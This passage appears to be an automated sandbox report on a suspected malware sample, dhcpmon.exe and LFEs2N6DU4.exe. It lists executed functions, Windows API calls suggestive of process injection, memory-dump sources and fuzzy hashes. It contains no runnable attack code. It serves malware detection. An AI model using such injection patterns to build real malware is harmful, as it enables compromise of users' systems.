Instruction Fuzzy Hash: 502124B6D002098FCB10CFE9C584BDEBBF4AF48324F14882AE558A7610D778A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0294DCC8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0294DD3B

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 6c0220e373777d96dc80fddc4eb8c0d55b75f931daebb85a21b8ce0a0bebd5f6
Instruction ID: fe15f62e7e1dba32ff1d10fced384f5b255431d07bbae0b5015b38e479aeb6eb
Opcode Fuzzy Hash: 6c0220e373777d96dc80fddc4eb8c0d55b75f931daebb85a21b8ce0a0bebd5f6
Instruction Fuzzy Hash: BE2106B59006099FCB10CFAAC484BDEBBF4FF88324F54842AE558A7650D778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294B980, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0294B9F6

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9d72b36cd3f2ac48098824d57108dac55acb1c647ee39dd608afa67487c423fd
Instruction ID: 902d3916c0499d3ee634ce199e7eb28bd53ce51ef791f63eeacf0ba3752ff5ab
Opcode Fuzzy Hash: 9d72b36cd3f2ac48098824d57108dac55acb1c647ee39dd608afa67487c423fd
Instruction Fuzzy Hash: 98113671D00249DFCB10DFA9C844AEEBBF5EF88328F14881AE555A7210CB759945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 029494A0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02949513

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 68d56843de8b8c40919685863e2dc92ea6c88a1700c4132a2f3306fa30c04488
Instruction ID: 660fd1aebc0877e8ee35543bdb7bae297ef47c54bcd8e083bb6d84ce50d5cd3f
Opcode Fuzzy Hash: 68d56843de8b8c40919685863e2dc92ea6c88a1700c4132a2f3306fa30c04488
Instruction Fuzzy Hash: 512106719006099FDB10CF9AC484BDEBBF8EB48324F10842AE858A7250D774A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294B988, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0294B9F6

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1710ab82f9d9669fecad7a7c1c83f67209e69e8ead8d1a0c2d65f9ddd34c1859
Instruction ID: 7f4993fd9f589a4f29c3384576b93541fa7ae3fd095ef0434669c090e8e58dfe
Opcode Fuzzy Hash: 1710ab82f9d9669fecad7a7c1c83f67209e69e8ead8d1a0c2d65f9ddd34c1859
Instruction Fuzzy Hash: 35112671900349DFCB10DFAAC844BEFBBF9AF88328F14881AE515A7250C775A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294B7FE, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0294B862

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 654752a2a2da4b1ec6d504133e1c778fa1270df7c3169c0f008ad22bab27f1f3
Instruction ID: 00154e8962477ed47c7fcd09510f99e3261d54aa2f9eea93d12bfe3d435fca9b
Opcode Fuzzy Hash: 654752a2a2da4b1ec6d504133e1c778fa1270df7c3169c0f008ad22bab27f1f3
Instruction Fuzzy Hash: 9C111671D00349CBDB10DFAAC444BEEFBF9AB88328F14882AD515A7250CB74A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294B800, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0294B862

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6ecb4d1729e74342a0e90e04374471c146563b61693b3cd2d43c509b82d19191
Instruction ID: 7fde450cea81d7d9f3bcf6f823f0c380533bbd43080201bab78bd776972e8f06
Opcode Fuzzy Hash: 6ecb4d1729e74342a0e90e04374471c146563b61693b3cd2d43c509b82d19191
Instruction Fuzzy Hash: E811F871D00749CBDB10DFAAC444BEFBBF9AB88328F14882AD515A7250CB75A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 028AD4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396910780.00000000028AD000.00000040.00000001.sdmp, Offset: 028AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6360bc8353bf5c7f0d63d4b213746a65e410b823295967fb140822481b5186
Instruction ID: 97b1f196ce92b730a9bd9b1add66d61c333ab8932cb1b9f0b11df5c05829047b
Opcode Fuzzy Hash: ff6360bc8353bf5c7f0d63d4b213746a65e410b823295967fb140822481b5186
Instruction Fuzzy Hash: 9121257D500304DFEB04DF50D9D4B66BBA5FB88328F248569E809CB616C736D846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 028AD3EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396910780.00000000028AD000.00000040.00000001.sdmp, Offset: 028AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be862b067116fbef5643b39ba4a238620d5a77214a98ab97266895973f78fc8
Instruction ID: 187ae36805ff13975f86b7076eb2d3a2e8468dc9145565ea29b0c0f784c396e1
Opcode Fuzzy Hash: 4be862b067116fbef5643b39ba4a238620d5a77214a98ab97266895973f78fc8
Instruction Fuzzy Hash: 4A21287D505304DFEB08DF50D8D0B66BB65FB88324F24C569E909CBA16C736E846C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 028BD030, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396988864.00000000028BD000.00000040.00000001.sdmp, Offset: 028BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cfd8f393d6e72cdfac0197c806e3ea4d79e10b88030b1a256aefb358f5ca4e7
Instruction ID: 3d2d8737906712f0b2f9432a85f248755a9e978784c434a993644d51a4b5aaaf
Opcode Fuzzy Hash: 4cfd8f393d6e72cdfac0197c806e3ea4d79e10b88030b1a256aefb358f5ca4e7
Instruction Fuzzy Hash: 5221F67D504244EFDB11DB14D5C0BA6BBA9FF84218F24C56DD8098B341C336D84BC6A1

Uniqueness

Uniqueness Score: -1.00%

Function 028AD4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396910780.00000000028AD000.00000040.00000001.sdmp, Offset: 028AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction ID: 0b5fd73adb3f6baa84507effd14fecf9c1527cdb97fa5a41aab6e31ef8783557
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: B211D37A504280CFDB11CF10D5C4B16BF71FB84324F24C6A9D8098B656C33AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 028AD3E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396910780.00000000028AD000.00000040.00000001.sdmp, Offset: 028AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction ID: 3d3101d55f7b5aff996a77ea9bd0185a1b7608da2e3a5e25319b921347128f7c
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: C311E67A505280DFDF15CF10D5D4B16BF72FB84324F24C6A9D8088BA56C33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 028BD02B, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.396988864.00000000028BD000.00000040.00000001.sdmp, Offset: 028BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f51a3483004601a6d468602a3be9c25d5a08e1c9b294fa8fcae9280015bf69
Instruction ID: fecec11c54390c7dfd72ddd2445c69bfc61d20942103d2e32e9c920ea9ff8ee0
Opcode Fuzzy Hash: a5f51a3483004601a6d468602a3be9c25d5a08e1c9b294fa8fcae9280015bf69
Instruction Fuzzy Hash: 3A118F7A504680DFDB12CF14D584755BBA1FB84224F24C6AED8488B746C33AD44BCB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: LFEs2N6DU4.exe PID: 6504 Parent PID: 2860 LFEs2N6DU4.exeCOMMON

Executed Functions

Function 055F93E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 055F962E

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cce20363c401ad1a41853cf1afd853d2321de0a724aaa1c04ce14c002aed5496
Instruction ID: d46732c399662f33a9a761695f9297e28e87e596ab3baaad0e31d5ae6148a99d
Opcode Fuzzy Hash: cce20363c401ad1a41853cf1afd853d2321de0a724aaa1c04ce14c002aed5496
Instruction Fuzzy Hash: 17713770A00B058FDB24DF6AC444BAABBF5FF88214F10892ED54AD7A50DB75E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 055FFB20, Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055FFD0A

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ef30ef3872f0370e0a86dd1af15aee2a4f5e7cc2b663967fcff68edc442737fa
Instruction ID: 34349c5153a93834d644d0751a9a78a7318e91c6daee17cea54a6f882df0cc1e
Opcode Fuzzy Hash: ef30ef3872f0370e0a86dd1af15aee2a4f5e7cc2b663967fcff68edc442737fa
Instruction Fuzzy Hash: 976154B1C043889FDF11CFA9C881ADDBFB1BF49310F28816AE818AB212D7309945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 055FFB98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055FFD0A

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0fac2d4646ad5526a125074fa8ae431528b34ab137af8240d79a936a0703816a
Instruction ID: 3cb7e17330d6ef43045d1d0c9fe395c1aac7c67ceece5048229361cc490e3008
Opcode Fuzzy Hash: 0fac2d4646ad5526a125074fa8ae431528b34ab137af8240d79a936a0703816a
Instruction Fuzzy Hash: D3511371C04249AFDF11CFA9C884ADEBFB1FF48314F24816AE918AB221D7719955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055FDA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055FFD0A

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 52dfba2e5bba321b491af98dc4c833e12263724fa8c5b9026b1488abd1ab1438
Instruction ID: 3ce1a5e9c01ae75c00197a8b9a2210a0bbb8250db79b543b084a8a4af222f61a
Opcode Fuzzy Hash: 52dfba2e5bba321b491af98dc4c833e12263724fa8c5b9026b1488abd1ab1438
Instruction Fuzzy Hash: 6351CFB1D10309DFDB14CFA9C884ADEBBB5FF48314F24852AE919AB210D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055FA14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055FBCC6,?,?,?,?,?), ref: 055FBD87

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3e6e0545a11fa4c60b477c6a0868dfa9960aedca19630e35c347f9ce37e51797
Instruction ID: dabb2b729a04f464bd51db82a7d622e002860b72c880d468f7303f8e8aa56dc1
Opcode Fuzzy Hash: 3e6e0545a11fa4c60b477c6a0868dfa9960aedca19630e35c347f9ce37e51797
Instruction Fuzzy Hash: 2121D6B5900248DFDB10CFA9D484ADEBBF5FB48324F14841AE915A7310D378A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 055FBCF9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055FBCC6,?,?,?,?,?), ref: 055FBD87

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 92c0db79e964e04a7c3833221725006f94699419e2d0ab798f24b0c2ae743da0
Instruction ID: 97ab3b8f3bd4a49f34d7dcfd7f62680cd4e3693b0f0b03e97e4e905e495f3f4e
Opcode Fuzzy Hash: 92c0db79e964e04a7c3833221725006f94699419e2d0ab798f24b0c2ae743da0
Instruction Fuzzy Hash: AC21D2B5900248DFDB10CFA9D984ADEBBF4FB48324F14841AE959B7210C378AA44DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 055F8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,055F96A9,00000800,00000000,00000000), ref: 055F98BA

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8cb1aaf139c86b3b4377ab724b79861b026191bf9afae0db3b805e88090f7970
Instruction ID: 5252b1e42130d1daf37098e995f6676a3349ae0976f8d5ab0b826b4efe0acb6e
Opcode Fuzzy Hash: 8cb1aaf139c86b3b4377ab724b79861b026191bf9afae0db3b805e88090f7970
Instruction Fuzzy Hash: 2811F2B69006098BDB10CFAAD444BDEBBF4FB88320F14842EE919B7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 055F9849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,055F96A9,00000800,00000000,00000000), ref: 055F98BA

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14d5ff74c02d821e4a1d460e65c70e30ef1e3d3b53373521c98b473a7a8f9630
Instruction ID: a37e09e374f1c036e32984f59af9fa4f0df72e56c70e45dfbeb252008f2a2c28
Opcode Fuzzy Hash: 14d5ff74c02d821e4a1d460e65c70e30ef1e3d3b53373521c98b473a7a8f9630
Instruction Fuzzy Hash: 8E11F2B69002098BDB10CFAAD444BDEBBF4FB88320F14842AE515A7600C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 055F95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 055F962E

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f23e1ab5fdc2544aa4375500e836513204eb36c3d1265889c440ab019d5ac6bf
Instruction ID: 4f7fdb6439f69b46fd65546bfadc6bf51122e3a877c425398602c22c0a17e10a
Opcode Fuzzy Hash: f23e1ab5fdc2544aa4375500e836513204eb36c3d1265889c440ab019d5ac6bf
Instruction Fuzzy Hash: 0D11DFB6D006498FDB10CF9AC444BDEFBF4BB88324F14852AD929B7610C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 055FDA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,055FFE28,?,?,?,?), ref: 055FFE9D

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d1c93e6d96fd7714dfb9e2b5999c4bf2ea3621e31f663d2072df14021840c9a8
Instruction ID: 9549faea9ca3912a958008a16ece5c88d866f32d56c87de8ed4e9e95588c6f27
Opcode Fuzzy Hash: d1c93e6d96fd7714dfb9e2b5999c4bf2ea3621e31f663d2072df14021840c9a8
Instruction Fuzzy Hash: 1A11F5B59002489FDB50DF99D485BDEBBF8FB48324F14841AEA15B7701C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 055FFE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,055FFE28,?,?,?,?), ref: 055FFE9D

Memory Dump Source

Source File: 00000018.00000002.396700419.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2c281a00d1b1fed05f4ece16cd51ef939e9f8dff8753f91bb5fd6334d5e3b23e
Instruction ID: bd940f9bb182ae92c4b3d1f4d8bc3e3291cbda33a72c9bf9679dbc3b4ed59214
Opcode Fuzzy Hash: 2c281a00d1b1fed05f4ece16cd51ef939e9f8dff8753f91bb5fd6334d5e3b23e
Instruction Fuzzy Hash: 8711F2B59002489FDB10DF99D589BDEBBF8FB88324F20841AE959B7600D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0140D4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.394143029.000000000140D000.00000040.00000001.sdmp, Offset: 0140D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ed3ed14cb062a4fda0fc05eda1ddf1f290515b24f5be7842cdc9ea15c455f5
Instruction ID: cc308517d23db2b21ea406afb4d0588e9ac4134d174991459b27ebc15eabf604
Opcode Fuzzy Hash: 09ed3ed14cb062a4fda0fc05eda1ddf1f290515b24f5be7842cdc9ea15c455f5
Instruction Fuzzy Hash: 3621C471904240DFDB06DFD5D9C0B67BB65FB88328F24857AED050A2A6C336E85AC6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0141D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.394202428.000000000141D000.00000040.00000001.sdmp, Offset: 0141D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe293d1eb9098b51d8abff9624096a9eb11184c07cb38e8b1b5ec88b42a99d2
Instruction ID: 4a4e59660eb9dbe898afa278c55e34a8353e511a8f149a4815907498aaabb117
Opcode Fuzzy Hash: 3fe293d1eb9098b51d8abff9624096a9eb11184c07cb38e8b1b5ec88b42a99d2
Instruction Fuzzy Hash: 8E2106F5A04200DFDB15CF94D8C8B16BFA5EB84358F24C96ED8090B36AC336D847C661

Uniqueness

Uniqueness Score: -1.00%

Function 0141D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.394202428.000000000141D000.00000040.00000001.sdmp, Offset: 0141D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412e8501af58a51b5120c985d589d6cf0e2b2356e1323fc79348d4bf0570ddaf
Instruction ID: b99b276948a23684b140567dc1cf70e4b596f9bf8a8aabb5da3aaafad4d6a42a
Opcode Fuzzy Hash: 412e8501af58a51b5120c985d589d6cf0e2b2356e1323fc79348d4bf0570ddaf
Instruction Fuzzy Hash: 7C2180B55093808FDB02CF24D594716BF71EB46214F28C5DBD8498F667C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0140D49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.394143029.000000000140D000.00000040.00000001.sdmp, Offset: 0140D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction ID: 25b32d5d872f862a9d9db9b4e32bf0ae7e38d8617d03804600a9ce0120178039
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: 3F11AF76904280CFDB12CF94D5C4B16BF71FB84324F2486AADD050B667C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6648 Parent PID: 6188 dhcpmon.exeCOMMON

Executed Functions

Function 0122B6C0, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0122B730
GetCurrentThread.KERNEL32 ref: 0122B76D
GetCurrentProcess.KERNEL32 ref: 0122B7AA
GetCurrentThreadId.KERNEL32 ref: 0122B803

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ed14b4b0dc0ba15e74f9efaa991dfcd464c02e53d2b2f7d1283137943247c60a
Instruction ID: c8cb38391aaa5bbabcceff44eab270245e7342b2d66d0900bb056c1cab784788
Opcode Fuzzy Hash: ed14b4b0dc0ba15e74f9efaa991dfcd464c02e53d2b2f7d1283137943247c60a
Instruction Fuzzy Hash: 675154B59002598FDB18CFA9D588BDEBBF0BF48304F24845AE019A7260D774A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0122B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0122B730
GetCurrentThread.KERNEL32 ref: 0122B76D
GetCurrentProcess.KERNEL32 ref: 0122B7AA
GetCurrentThreadId.KERNEL32 ref: 0122B803

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 92ea2a5b79c26990865aa7f019028f830897f5a566c4f23eabe0c343b8c635b7
Instruction ID: 6ca70d43385a174405eccbef56822313cda07f5b729850c857f994dcbeba2b45
Opcode Fuzzy Hash: 92ea2a5b79c26990865aa7f019028f830897f5a566c4f23eabe0c343b8c635b7
Instruction Fuzzy Hash: F95156B4D002599FDB18CFA9D588BDEBBF0BF48304F24846AE019A7350D7746844CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 012293E8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0122962E

Strings

HR, xrefs: 0122958B
HR, xrefs: 01229566

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: HandleModule
String ID: HR$HR
API String ID: 4139908857-4037001784
Opcode ID: 41dc11a61b3fbfac388760aac46c1b9163bdec94dfc9d0d82f19c43f9212d921
Instruction ID: c107115d7cb84857ce442f89e4b34f07dd30eee932fbf60cded875be2a720ced
Opcode Fuzzy Hash: 41dc11a61b3fbfac388760aac46c1b9163bdec94dfc9d0d82f19c43f9212d921
Instruction Fuzzy Hash: 73713670A10B259FDB24DF6AD0447AABBF1FF88308F00892ED58AD7A50D774E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0122FBEC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0122FD0A

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b09f40aeffb385db7077f3bccb82212b5e5444cc5cd77f3bdfe05d9bc8739e36
Instruction ID: 02bf2797192d83e91386b99de8372707cb40796e31a2f61f949a7ce83ba65473
Opcode Fuzzy Hash: b09f40aeffb385db7077f3bccb82212b5e5444cc5cd77f3bdfe05d9bc8739e36
Instruction Fuzzy Hash: 1751E2B1D10319EFDB14CFA9C980ADEBBB1FF48314F24852AE818AB210D7749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0122FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0122FD0A

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ea10cb8b080cc5df444b9c230c239a8d08f4fed5ae925f0d443713542693481d
Instruction ID: 436afaec5bf1e8cb841ee3508994486874eecc1fe7c22d8d0fe55a87db48835f
Opcode Fuzzy Hash: ea10cb8b080cc5df444b9c230c239a8d08f4fed5ae925f0d443713542693481d
Instruction Fuzzy Hash: 2141E0B1D10319EFDB14CFA9C980ADEBBB5FF48310F24852AE919AB210D7709845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0122BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0122BD87

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 73366858684b705ac948f1f75ce9f3c4bfa2b805eca04489264043a384a002e5
Instruction ID: 9546daf8fde0faaeb9ab022c0d30546e995231b240e7341dc0cb7468e6402e03
Opcode Fuzzy Hash: 73366858684b705ac948f1f75ce9f3c4bfa2b805eca04489264043a384a002e5
Instruction Fuzzy Hash: FB2103B5900258DFDB10CFA9D984ADEBBF4EB48320F14841AE918A3310D338AA54CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0122BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0122BD87

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4d83d4f20e9a7f71dca3c44f9c37144b34e40f963cb1cffef910cc70a72e2828
Instruction ID: 0f7db4e7cc54064638c36358cd2ba4f9a97bc93fe0822bc63823e74354619d63
Opcode Fuzzy Hash: 4d83d4f20e9a7f71dca3c44f9c37144b34e40f963cb1cffef910cc70a72e2828
Instruction Fuzzy Hash: 8C21E4B5900219EFDB10CFAAD484ADEBBF8FB48320F14841AE914A3310C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01228768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012296A9,00000800,00000000,00000000), ref: 012298BA

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d28d34f5dd886c4872f58d9a00c23aa504ef21c8b779306ff42e7ef8c2374a95
Instruction ID: d51431607b31ae1c763ca7e2756aba253523a39cf30c146da7accf16b25830c2
Opcode Fuzzy Hash: d28d34f5dd886c4872f58d9a00c23aa504ef21c8b779306ff42e7ef8c2374a95
